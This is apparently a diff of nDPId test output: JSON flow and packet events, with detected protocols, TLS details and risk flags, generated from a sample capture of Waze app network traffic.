-00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1435587878215,"flow_last_seen":1435587880857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21888,"flow_tot_l4_payload_len":57094,"flow_avg_l4_payload_len":1730,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
-00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587871918,"flow_last_seen":1435587874945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1435587871929,"flow_last_seen":1435587874378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":4561,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
-00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1435587871935,"flow_last_seen":1435587874495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587867755,"flow_last_seen":1435587873026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11779,"flow_tot_l4_payload_len":61187,"flow_avg_l4_payload_len":1653,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867755,"flow_last_seen":1435587867755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587867755,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1435587867755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587867755,"pkt":"ABoRAAACABoRAAABCABFAAA8zNlAAEAGoisKCAABQSeAh9aDAFDjx6dUAAAAAKAC\/\/+uwgAAAgQFtAQCCAoACGuNAAAAAAEDAwg="} 
+00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1435587867759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAodHFAABAGKqhBJ4CHCggAAQBQ1oMcOFir48enVVAS\/\/8NRwAA"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1435587867759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAozNpAAEAGoj4KCAABQSeAh9aDAFDjx6dVHDhYrFAQ\/\/8NSAAA"} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587867755,"flow_last_seen":1435587867781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1435587867781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":0,"content_type":"","user_agent":"Android"}} 
+00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1435587868123,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587868123,"pkt":"ABoRAAACABoRAAABCABFAABNMsNAAEAGQsQKECWdriXnUaUQFGaA18okWhY9doAYAVcnqgAAAQEICgAIa9FBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868632,"flow_last_seen":1435587868632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868632,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1435587868632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868632,"pkt":"ABoRAAACABoRAAABCABFAAA814xAAEAGPpQKCAABNubjrLHZAFCatruPAAAAAKAC\/\/+u6AAAAgQFtAQCCAoACGwDAAAAAAEDAwg="} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1435587868633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868633,"pkt":"ABoRAAACABoRAAABCABFAAAodHNAABAG0cE25uOsCggAAQBQsdllSURwmra7kFAS\/\/\/ZDAAA"} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868634,"flow_last_seen":1435587868634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868634,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1435587868634,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868634,"pkt":"ABoRAAACABoRAAABCABFAAA8jYZAAEAGx0MKCAABLjOtto0EAbvOcuGFAAAAAKAC\/\/+3SQAAAgQFtAQCCAoACGwDAAAAAAEDAwg="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1435587868635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868635,"pkt":"ABoRAAACABoRAAABCABFAAAodHRAABAGEGouM622CggAAQG7jQQxjR56znLhhlAS\/\/87IAAA"} 
+00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868635,"flow_last_seen":1435587868635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868635,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1435587868635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868635,"pkt":"ABoRAAACABoRAAABCABFAAA8H6lAAEAGNSEKCAABLjOtto0GAbtbbHOtAAAAAKAC\/\/+YJQAAAgQFtAQCCAoACGwEAAAAAAEDAwg="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1435587868644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868644,"pkt":"ABoRAAACABoRAAABCABFAAAodHVAABAGEGkuM622CggAAQG7jQakk4xSW2xzrlAS\/\/87HgAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1435587868644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868644,"pkt":"ABoRAAACABoRAAABCABFAAAo141AAEAGPqcKCAABNubjrLHZAFCatruQZUlEcVAQ\/\/\/ZDQAA"} 
+00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAojYdAAEAGx1YKCAABLjOtto0EAbvOcuGGMY0ee1AQ\/\/87IQAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAoH6pAAEAGNTQKCAABLjOtto0GAbtbbHOupJOMU1AQ\/\/87HwAA"} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868632,"flow_last_seen":1435587868906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1435587868906,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
+00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868632,"flow_last_seen":1435587868910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1435587868910,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868996,"flow_last_seen":1435587868996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868996,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1435587868996,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868996,"pkt":"ABoRAAACABoRAAABCABFAAA8cVdAAEAGm2kKCAABrcJ2MI7pAburox1\/AAAAAKAC\/\/9UDAAAAgQFtAQCCAoACGwoAAAAAAEDAwg="} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1435587868998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868998,"pkt":"ABoRAAACABoRAAABCABFAAAodHhAABAGyFytwnYwCggAAQG7julUXOKAq6MdgFAS\/\/\/xMQAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1435587869002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869002,"pkt":"ABoRAAACABoRAAABCABFAAAocVhAAEAGm3wKCAABrcJ2MI7pAburox2AVFzigVAQ\/\/\/xMgAA"} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868634,"flow_last_seen":1435587869002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869002,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868996,"flow_last_seen":1435587869054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1435587869054,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868635,"flow_last_seen":1435587869106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868996,"flow_last_seen":1435587869107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1435587869107,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"23f1f6e2f0015c166df49fdab4280370","unsafe_cipher":2,"cipher":"TLS_ECDHE_RSA_WITH_RC4_128_SHA"}} 